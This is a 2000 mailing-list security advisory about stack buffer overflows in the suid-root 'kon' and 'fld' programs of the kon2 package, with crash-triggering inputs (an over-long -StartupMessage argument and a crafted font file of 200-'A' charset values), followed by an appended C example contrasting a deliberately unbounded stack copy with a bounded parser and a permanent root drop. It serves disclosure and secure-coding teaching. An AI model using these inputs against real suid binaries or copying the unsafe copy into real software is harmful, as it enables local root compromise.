Subject: Problems with "kon2" package
From: Chris Evans (chris at FERRET.LMH.OX.AC.UK)
Date: Mon Jun 19 2000 - 17:51:53 CDT
- Next message: Chris Evans: "XFree86: libICE DoS"
- Previous message: Chris Evans: "XFree86: Various nasty libX11 holes"
Hi,
I had reason to investigate the security of a package called "kon2" - a
program for displaying Japanese on the console I'm led to believe.
SUMMARY
=======
kon2-0.3.9
In the version I briefly examined, there were three suid-root executables
- kon
- fld
- newvc
Here are details of breakages in "kon" and "fld". I believe both lead to
root compromise, although I haven't verified if something has dropped root
privileges or not at the time of the overflows.
DEMOS
=====
No discussion of code flaws today, because boring stack overflows are
being used
1) kon
kon VGA -StartupMessage `perl -e 'print "A"x10000'`
=> segfault with EIP 0x41414141
2) fld
a) Create file "read.me.and.die", contents:
CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
...
BUT substitute each sequence of A's for 200 A's
b) fld -t bdf read.me.and.die
I don't get a clean 0x41414141 stacktrace but that's just a minor detail,
and these things are always circumventable (I think a pointer gets
toasted in between two char[] buffers on the stack)
Cheers
Chris
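Added example, not code from the post above or from kon2 itself: a toy parser for the two-line header shape in the fld demo (CHARSET_REGISTRY"value" / CHARSET_ENCODING"value"), showing the unbounded copy into a fixed char[] on the stack next to a bounded version that refuses over-long values, plus the permanent privilege drop and re-check that a suid-root program should do before it reads argv-derived strings or a user-named font file. VALUE_MAX, the function names, the sample header and the 200-'A' hostile header are assumptions made for this example.

```c
/* Added example; not from the kon2 source. Buffer sizes and names are assumed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define VALUE_MAX 32      /* assumed size of the fixed char[] on the stack */
#define LINE_MAX_DEMO 512
#define KEY_IS(line, key) (strncmp((line), (key), sizeof(key) - 1) == 0)

struct charset { char registry[VALUE_MAX]; char encoding[VALUE_MAX]; };

/* Find the text between the first pair of double quotes: 0 on success, -1 if
 * the line is not KEY"value". Sets *start and *len; copies nothing. */
static int quoted_value(const char *line, const char **start, size_t *len)
{
    const char *open = strchr(line, '"');
    if (open == NULL) return -1;
    const char *close = strchr(open + 1, '"');
    if (close == NULL) return -1;
    *start = open + 1;
    *len = (size_t)(close - open - 1);
    return 0;
}

/* Vulnerable pattern: the value is copied into a VALUE_MAX-byte stack array
 * with no length check. A 200-byte value (as in read.me.and.die) runs past
 * the array into whatever the compiler placed above it: other locals, saved
 * pointers, the return address. Shown for contrast; never give it untrusted input. */
int charset_value_unsafe(const char *line, char *out)
{
    char value[VALUE_MAX];
    const char *start; size_t len;
    if (quoted_value(line, &start, &len) != 0) return -1;
    memcpy(value, start, len);            /* no bound on len: stack smash */
    value[len] = '\0';
    memcpy(out, value, len + 1);
    return 0;
}

/* Hardened version: reject values that do not fit (-2) rather than truncate
 * silently, and write only inside the caller's VALUE_MAX-byte buffer. */
int charset_value_safe(const char *line, char *out)
{
    const char *start; size_t len;
    if (quoted_value(line, &start, &len) != 0) return -1;
    if (len >= VALUE_MAX) return -2;      /* leave room for the terminator */
    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}

/* Walk the header line by line with the safe parser. Unknown keys are
 * skipped; 0 on success, -1 malformed line, -2 over-long value or line. */
int charset_parse_header(const char *text, struct charset *cs)
{
    char line[LINE_MAX_DEMO];
    const char *p = text;
    memset(cs, 0, sizeof *cs);
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        if (n >= sizeof line) return -2;
        memcpy(line, p, n);
        line[n] = '\0';
        int rc = 0;
        if (KEY_IS(line, "CHARSET_REGISTRY")) rc = charset_value_safe(line, cs->registry);
        else if (KEY_IS(line, "CHARSET_ENCODING")) rc = charset_value_safe(line, cs->encoding);
        if (rc != 0) return rc;
        p = nl ? nl + 1 : p + n;
    }
    return 0;
}

/* Sample inputs constructed for this example. */
#define GOOD_HEADER "CHARSET_REGISTRY\"ISO8859\"\nCHARSET_ENCODING\"1\"\n"

const char *hostile_header(void)      /* the post's file: each value is 200 'A's */
{
    static char buf[LINE_MAX_DEMO];
    char as[201];
    memset(as, 'A', 200); as[200] = '\0';
    snprintf(buf, sizeof buf, "CHARSET_REGISTRY\"%s\"\nCHARSET_ENCODING\"%s\"\n", as, as);
    return buf;
}

static struct charset last;          /* result of the most recent header_status() */
int header_status(const char *text) { return charset_parse_header(text, &last); }
const char *last_registry(void) { return last.registry; }
const char *last_encoding(void) { return last.encoding; }

/* Give up root for good before touching user-controlled data, and re-read the
 * ids instead of trusting return values. 0 if effective == real afterwards.
 * Without setuid this is a no-op that still succeeds. */
int drop_root_permanently(void)
{
    uid_t uid = getuid(); gid_t gid = getgid();
    if (setgid(gid) != 0) return -1;            /* groups first, while still root */
    if (setuid(uid) != 0) return -1;
    if (geteuid() != uid || getegid() != gid) return -1;
    if (uid != 0 && setuid(0) == 0) return -1;  /* regaining root must now fail */
    return 0;
}

int main(void)
{
    struct charset cs;
    if (drop_root_permanently() != 0) { fputs("could not drop privileges\n", stderr); return 1; }
    int rc = charset_parse_header(GOOD_HEADER, &cs);
    printf("benign header: rc=%d registry=%s encoding=%s\n", rc, cs.registry, cs.encoding);
    printf("hostile header: rc=%d (rejected before any copy)\n",
           charset_parse_header(hostile_header(), &cs));
    return 0;
}
```

The ordering in drop_root_permanently matters: setgid must come before setuid, because once the effective uid is unprivileged the group change is no longer permitted, and the re-read of the ids is what actually tells you the drop happened, which is the question the post leaves open for kon and fld.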